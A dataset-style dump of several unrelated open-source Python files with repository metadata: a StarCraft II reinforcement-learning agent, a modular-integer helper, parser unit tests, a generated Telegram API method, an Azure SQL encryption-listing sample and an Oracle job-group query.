while True:
total_frames += 1
self.obs = obs.observation["feature_screen"][self.features]
s = np.expand_dims(self.obs, 0)
if max_frames and total_frames >= max_frames:
print("max frames reached")
return
if obs.last():
print(f"Episode {self.n_episodes + 1}:\t total frames: {total_frames} Epsilon: {self._epsilon.value()}")
self._epsilon.increment()
break
action = self.get_action(s, unsqueeze=False)
env_actions = self.get_env_action(action, obs, command=_ATTACK_SCREEN)
try:
obs = env.step([env_actions])[0]
r = obs.reward - 10
except ValueError as e:
print(e)
obs = env.step([actions.FunctionCall(_NO_OP, [])])[0]
r = obs.reward - 1000
episode_reward += r
s1 = np.expand_dims(obs.observation["feature_screen"][self.features], 0)
done = r > 0
if self._epsilon.isTraining:
transition = Transition(s, action, s1, r, done)
self._memory.push(transition)
if total_frames % self.train_q_per_step == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self.train_q(squeeze=True)
if total_frames % self.target_q_update_frequency == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self._Qt = copy.deepcopy(self._Q)
if evaluate_checkpoints > 0 and ((self.n_episodes % evaluate_checkpoints) - (evaluate_checkpoints - 1) == 0 or self.n_episodes == 0):
print('Evaluating...')
self._epsilon.isTraining = False # we need to make sure that we act greedily when we evaluate
self.run_loop(env, max_episodes=max_episodes, evaluate_checkpoints=0)
self._epsilon.isTraining = True
if evaluate_checkpoints == 0: # this should only activate when we're inside the evaluation loop
self.reward.append(episode_reward)
print(f'Evaluation Complete: Episode reward = {episode_reward}')
break
self.n_episodes += 1
if len(self._loss) > 0:
self.loss.append(self._loss[-1])
self.max_q.append(self._max_q[-1])
if self.n_episodes % save_checkpoints == 0:
if self.n_episodes > 0:
self.save_data(episodes_done=self.n_episodes)
except KeyboardInterrupt:
pass
finally:
print("finished")
elapsed_time = time.time() - start_time
try:
print("Took %.3f seconds for %s steps: %.3f fps" % (
elapsed_time, total_frames, total_frames / elapsed_time))
except:
print("Took %.3f seconds for %s steps" % (elapsed_time, total_frames))
class BattleAgentBeacon(BattleAgent):
def __init__(self, save_name=None, load_name=None):
super(BattleAgentBeacon, self).__init__(save_name=save_name, load_name=load_name)
self.initialize_model(BeaconCNN2())
self.features = _PLAYER_RELATIVE
def run_loop(self, env, max_frames=0, max_episodes=10000, save_checkpoints=500, evaluate_checkpoints=10):
"""A run loop to have agents and an environment interact."""
total_frames = 0
start_time = time.time()
action_spec = env.action_spec()
observation_spec = env.observation_spec()
self.setup(observation_spec, action_spec)
try:
while self.n_episodes < max_episodes:
obs = env.reset()[0]
# remove unit selection from the equation by selecting the entire army on every new game.
select_army = actions.FunctionCall(_SELECT_ARMY, [[False]])
obs = env.step([select_army])[0]
self.reset()
episode_reward = 0
while True:
total_frames += 1
self.obs = obs.observation["feature_screen"][self.features]
s = np.expand_dims(self.obs, 0)
if max_frames and total_frames >= max_frames:
print("max frames reached")
return
if obs.last():
print(f"Episode {self.n_episodes + 1}:\t total frames: {total_frames} Epsilon: {self._epsilon.value()}")
self._epsilon.increment()
break
action = self.get_action(s, unsqueeze=True)
env_actions = self.get_env_action(action, obs, command=_ATTACK_SCREEN)
try:
obs = env.step([env_actions])[0]
r = obs.reward - 10
except ValueError as e:
print(e)
obs = env.step([actions.FunctionCall(_NO_OP, [])])[0]
r = obs.reward - 1000
episode_reward += r
s1 = np.expand_dims(obs.observation["feature_screen"][self.features], 0)
done = r > 0
if self._epsilon.isTraining:
transition = Transition(s, action, s1, r, done)
self._memory.push(transition)
if total_frames % self.train_q_per_step == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self.train_q(squeeze=False)
if total_frames % self.target_q_update_frequency == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self._Qt = copy.deepcopy(self._Q)
if evaluate_checkpoints > 0 and ((self.n_episodes % evaluate_checkpoints) - (evaluate_checkpoints - 1) == 0 or self.n_episodes == 0):
print('Evaluating...')
self._epsilon.isTraining = False # we need to make sure that we act greedily when we evaluate
self.run_loop(env, max_episodes=max_episodes, evaluate_checkpoints=0)
self._epsilon.isTraining = True
if evaluate_checkpoints == 0: # this should only activate when we're inside the evaluation loop
self.reward.append(episode_reward)
print(f'Evaluation Complete: Episode reward = {episode_reward}')
break
self.n_episodes += 1
if len(self._loss) > 0:
self.loss.append(self._loss[-1])
self.max_q.append(self._max_q[-1])
if self.n_episodes % save_checkpoints == 0:
if self.n_episodes > 0:
self.save_data(episodes_done=self.n_episodes)
except KeyboardInterrupt:
pass
finally:
print("finished")
elapsed_time = time.time() - start_time
try:
print("Took %.3f seconds for %s steps: %.3f fps" % (
elapsed_time, total_frames, total_frames / elapsed_time))
except:
print("Took %.3f seconds for %s steps" % (elapsed_time, total_frames))
class BattleAgentLimited(BattleAgent):
def __init__(self, save_name=None, load_name=None):
super(BattleAgentLimited, self).__init__(save_name=save_name, load_name=load_name)
self.steps_before_training = 256
self.features = [_PLAYER_RELATIVE, _UNIT_TYPE, _UNIT_HIT_POINTS]
self.radius = 15
self._screen_size = 64
self.initialize_model(FeatureCNNFCLimited(len(self.features), self.radius, screen_size=64))
def get_action(self, s, unsqueeze=True):
# greedy
if np.random.rand() > self._epsilon.value():
s = torch.from_numpy(s).to(self.device)
if unsqueeze:
s = s.unsqueeze(0).float()
else:
s = s.float()
with torch.no_grad():
self._action = self._Q(s).squeeze().cpu().data.numpy()
return self._action.argmax()
# explore
else:
action = np.random.randint(0, self.radius ** 2)
return action
def get_env_action(self, action, obs, command=_MOVE_SCREEN):
relative_action = np.unravel_index(action, [self.radius, self.radius])
y_friendly, x_friendly = (obs.observation["feature_screen"][_PLAYER_RELATIVE] == _PLAYER_FRIENDLY).nonzero()
# y_enemy, x_enemy = (obs.observation["feature_screen"][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()
if len(x_friendly) > 0:
action = [int(relative_action[1] - self.radius/2 + round(x_friendly.mean())),
int(relative_action[0] - self.radius/2 + round(y_friendly.mean()))]
friendly_coordinates = np.vstack((x_friendly, y_friendly)).T
if bool(np.sum(np.all(action == friendly_coordinates, axis=1))):
command = _MOVE_SCREEN
elif abs(sum(action)) < 2:
command = _MOVE_SCREEN
else:
# action = [int(relative_action[1] - self.radius/2), int(relative_action[0] - self.radius/2)]
return actions.FunctionCall(_NO_OP, [])
if command in obs.observation["available_actions"]:
return actions.FunctionCall(command, [[0], action])
else:
return actions.FunctionCall(_NO_OP, [])
|
[
"alanzhou93@gmail.com"
] |
alanzhou93@gmail.com
|
39ef41ca372b8c23e5a544cffabddd8ade50fad0
|
bb462a56300aff06f6265e500804a4ecc7e290c4
|
/mod_int.py
|
74edcf9d02e8596531719f955e0156a7cf5b6c2b
|
[
"CC0-1.0"
] |
permissive
|
nohtaray/competitive-programming.py
|
6d4f0b5b6dde3dfee5a12674a1d0143d760b3644
|
7d38884007541061ddd69d617a69a0d9bc6176fa
|
refs/heads/master
| 2023-06-15T01:17:41.744771
| 2023-05-27T14:37:04
| 2023-05-27T14:37:04
| 180,506,267
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
def ModInt(mod):
class _ModInt:
def __init__(self, value):
self.value = value % mod
def __add__(self, other):
if isinstance(other, _ModInt):
return _ModInt(self.value + other.value)
else:
return _ModInt(self.value + other)
def __sub__(self, other):
if isinstance(other, _ModInt):
return _ModInt(self.value - other.value)
else:
return _ModInt(self.value - other)
def __radd__(self, other):
return self.__add__(other)
def __mul__(self, other):
if isinstance(other, _ModInt):
return _ModInt(self.value * other.value)
else:
return _ModInt(self.value * other)
def __truediv__(self, other):
raise NotImplementedError()
def __int__(self):
return self.value
def __repr__(self):
return str(self.value)
return _ModInt
if __name__ == '__main__':
MI7 = ModInt(mod=7)
assert int(MI7(1) + MI7(8)) == 2
assert int(MI7(1) + 8) == 2
assert int(8 + MI7(1)) == 2
|
[
"ydt.hran2@gmail.com"
] |
ydt.hran2@gmail.com
|
ef9b5b666e8749d77a7b64d744affbcd8a64a543
|
963cac9e78c4b742f7e7800200de8d1582799955
|
/test/veetou/parserTests.py
|
797c7be4f0f217a2fd7bbe13910a3ec1cd8fde32
|
[] |
no_license
|
ptomulik/veetou
|
c79ceb3ca3d7ef7b261b2219489b6f0a7a83e1fa
|
b30be2a604f4426f832ec9805547ecd6cc9083fe
|
refs/heads/master
| 2021-01-22T17:28:57.271251
| 2019-01-05T01:46:43
| 2020-05-04T16:23:44
| 85,016,513
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,386
|
py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
import unittest
import veetou.parser as parser
class Test__Parser(unittest.TestCase):
def test__funcions_symbols__1(self):
self.assertIs(parser.dictmatcher , parser.functions_.dictmatcher)
self.assertIs(parser.fullmatch , parser.functions_.fullmatch)
self.assertIs(parser.fullmatchdict , parser.functions_.fullmatchdict)
self.assertIs(parser.ifullmatch , parser.functions_.ifullmatch)
self.assertIs(parser.imatch , parser.functions_.imatch)
self.assertIs(parser.imatcher , parser.functions_.imatcher)
self.assertIs(parser.match , parser.functions_.match)
self.assertIs(parser.matchdict , parser.functions_.matchdict)
self.assertIs(parser.matcher , parser.functions_.matcher)
self.assertIs(parser.permutexpr , parser.functions_.permutexpr)
self.assertIs(parser.reentrant , parser.functions_.reentrant)
self.assertIs(parser.scatter , parser.functions_.scatter)
self.assertIs(parser.search , parser.functions_.search)
self.assertIs(parser.searchpd , parser.functions_.searchpd)
self.assertIs(parser.skipemptylines , parser.functions_.skipemptylines)
def test__parsererror_symbols__1(self):
self.assertIs(parser.ParserError, parser.parsererror_.ParserError)
def test__parser_symbols__1(self):
self.assertIs(parser.Parser, parser.parser_.Parser)
self.assertIs(parser.RootParser, parser.parser_.RootParser)
def test__addressparser__1(self):
self.assertIs(parser.AddressParser, parser.addressparser_.AddressParser)
def test__contactparser__1(self):
self.assertIs(parser.ContactParser, parser.contactparser_.ContactParser)
def test__footerparser__1(self):
self.assertIs(parser.FooterParser, parser.footerparser_.FooterParser)
def test__headerparser__1(self):
self.assertIs(parser.HeaderParser, parser.headerparser_.HeaderParser)
def test__keymapparser__1(self):
self.assertIs(parser.KeyMapParser, parser.keymapparser_.KeyMapParser)
def test__pageparser__1(self):
self.assertIs(parser.PageParser, parser.pageparser_.PageParser)
def test__preambleparser__1(self):
self.assertIs(parser.PreambleParser, parser.preambleparser_.PreambleParser)
def test__reportparser__1(self):
self.assertIs(parser.ReportParser, parser.reportparser_.ReportParser)
def test__sheetparser__1(self):
self.assertIs(parser.SheetParser, parser.sheetparser_.SheetParser)
def test__summaryparser__1(self):
self.assertIs(parser.SummaryParser, parser.summaryparser_.SummaryParser)
def test__tableparser__1(self):
self.assertIs(parser.TableParser, parser.tableparser_.TableParser)
def test__tbodyparser__1(self):
self.assertIs(parser.TbodyParser, parser.tbodyparser_.TbodyParser)
def test__thparser__1(self):
self.assertIs(parser.ThParser, parser.thparser_.ThParser)
def test__trparser__1(self):
self.assertIs(parser.TrParser, parser.trparser_.TrParser)
if __name__ == '__main__':
unittest.main()
# Local Variables:
# # tab-width:4
# # indent-tabs-mode:nil
# # End:
# vim: set syntax=python expandtab tabstop=4 shiftwidth=4:
|
[
"ptomulik@meil.pw.edu.pl"
] |
ptomulik@meil.pw.edu.pl
|
9305c3a78026026cae6e03d11b5982d9cee7f094
|
0617c812e9bf58a2dbc1c1fef35e497b054ed7e4
|
/venv/Lib/site-packages/pyrogram/raw/functions/stats/get_megagroup_stats.py
|
320398dd3f9fb86f271aeb14aaca77b3bc298f8c
|
[] |
no_license
|
howei5163/my_framework
|
32cf510e19a371b6a3a7c80eab53f10a6952f7b2
|
492c9af4ceaebfe6e87df8425cb21534fbbb0c61
|
refs/heads/main
| 2023-01-27T14:33:56.159867
| 2020-12-07T10:19:33
| 2020-12-07T10:19:33
| 306,561,184
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,553
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetMegagroupStats(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0xdcdf8607``
Parameters:
channel: :obj:`InputChannel <pyrogram.raw.base.InputChannel>`
dark (optional): ``bool``
Returns:
:obj:`stats.MegagroupStats <pyrogram.raw.base.stats.MegagroupStats>`
"""
__slots__: List[str] = ["channel", "dark"]
ID = 0xdcdf8607
QUALNAME = "pyrogram.raw.functions.stats.GetMegagroupStats"
def __init__(self, *, channel: "raw.base.InputChannel", dark: Union[None, bool] = None) -> None:
self.channel = channel # InputChannel
self.dark = dark # flags.0?true
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetMegagroupStats":
flags = Int.read(data)
dark = True if flags & (1 << 0) else False
channel = TLObject.read(data)
return GetMegagroupStats(channel=channel, dark=dark)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
flags = 0
flags |= (1 << 0) if self.dark is not None else 0
data.write(Int(flags))
data.write(self.channel.write())
return data.getvalue()
|
[
"houwei5163"
] |
houwei5163
|
3e43c121fa98f0c8fd7478f5ac8cd4cfe08fcd43
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/sql/azure-mgmt-sql/generated_samples/transparent_data_encryption_list.py
|
3e2275f884eabc284c7627538174b4de0a236e32
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,661
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.sql import SqlManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-sql
# USAGE
python transparent_data_encryption_list.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = SqlManagementClient(
credential=DefaultAzureCredential(),
subscription_id="00000000-1111-2222-3333-444444444444",
)
response = client.transparent_data_encryptions.list_by_database(
resource_group_name="security-tde-resourcegroup",
server_name="securitytde",
database_name="testdb",
)
for item in response:
print(item)
# x-ms-original-file: specification/sql/resource-manager/Microsoft.Sql/preview/2022-08-01-preview/examples/TransparentDataEncryptionList.json
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
98afb32b4a54532746127c0a78d01a693fc7d98a
|
21899ea0e94cb58f8ac99b7c731f59e0232839eb
|
/src/python/T0/WMBS/Oracle/Subscriptions/HaveJobGroup.py
|
59ece2561182f2a6ec7589262150c04280d86513
|
[
"Apache-2.0"
] |
permissive
|
dmwm/T0
|
a6ee9d61abc05876fc24f8af69fe932a2f542d21
|
1af91d0b1971b7d45ea7378e754f2218ff9a8474
|
refs/heads/master
| 2023-08-16T10:55:27.493160
| 2023-08-11T09:38:03
| 2023-08-11T09:38:03
| 4,423,801
| 9
| 54
|
Apache-2.0
| 2023-09-14T11:43:30
| 2012-05-23T18:33:56
|
Python
|
UTF-8
|
Python
| false
| false
| 687
|
py
|
"""
_HaveJobGroup_
Oracle implementation of HaveJobGroup
For a given subscription check if there is an existing job group
"""
from WMCore.Database.DBFormatter import DBFormatter
class HaveJobGroup(DBFormatter):
sql = """SELECT 1
FROM wmbs_jobgroup
WHERE wmbs_jobgroup.subscription = :subscription
AND ROWNUM = 1
"""
def execute(self, subscription, conn = None, transaction = False):
results = self.dbi.processData(self.sql, { 'subscription' : subscription },
conn = conn, transaction = transaction)[0].fetchall()
return ( len(results) > 0 and results[0][0] == 1 )
|
[
"Dirk.Hufnagel@cern.ch"
] |
Dirk.Hufnagel@cern.ch
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.